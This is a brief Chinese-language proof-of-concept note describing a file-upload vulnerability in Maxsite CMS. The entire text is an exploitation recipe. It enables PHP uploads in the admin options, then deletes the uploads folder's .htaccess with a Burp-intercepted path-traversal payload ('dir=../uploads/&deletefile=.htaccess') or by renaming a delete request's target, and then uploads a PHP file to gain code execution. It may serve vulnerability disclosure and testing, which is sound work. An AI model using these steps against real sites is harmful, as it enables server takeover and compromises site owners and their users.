本页总览Maxsite CMS文件上传漏洞POC在 ~t/admin/options 添加 'php' 删除~/cms-108/uploads/.htaccess,有下面两种方式一选择要删除的页面burp抓包,payload如下:dir=../uploads/&deletefile=.htaccess二:随便上传一个文件,勾选文件,burp抓包,点击删除,然后更改要删除的文件名为./.htaccess接着直接上传php文件